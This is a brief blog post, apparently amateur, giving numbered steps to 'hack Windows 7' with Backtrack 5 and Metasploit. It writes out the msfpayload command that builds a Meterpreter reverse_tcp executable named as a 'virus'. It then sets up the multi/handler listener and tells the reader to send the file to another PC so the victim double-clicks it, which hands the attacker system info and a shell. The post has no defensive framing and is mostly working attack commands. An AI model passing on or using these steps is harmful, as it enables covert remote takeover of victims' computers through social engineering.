HACKING
WINDOWS 7 BY USING BACKTRACK 5
These steps to be followed :-
1. Firstly open Backtrack 5.
2 . @Konsole Terminal Work Via Backtrack 5.
3. Check your Backtrack IP.
4. Open konsole terminal and type ”
msfpayload windows/meterpreter/reverse_tcp LHOST=BT IP lport=4444 x
>/root/virusname.exe” .
5. Now type “ msfconsole “.
6. Use exploit/multi/handler.
7. Set payload
windows/meterpreter/reverse_tcp.
8. Set LHOST BT IP.
9. Exploit.
10. Then send virus
to other pc and doble click.
11. Then type
sysinfo.
12. And last shell.
No comments:
Post a Comment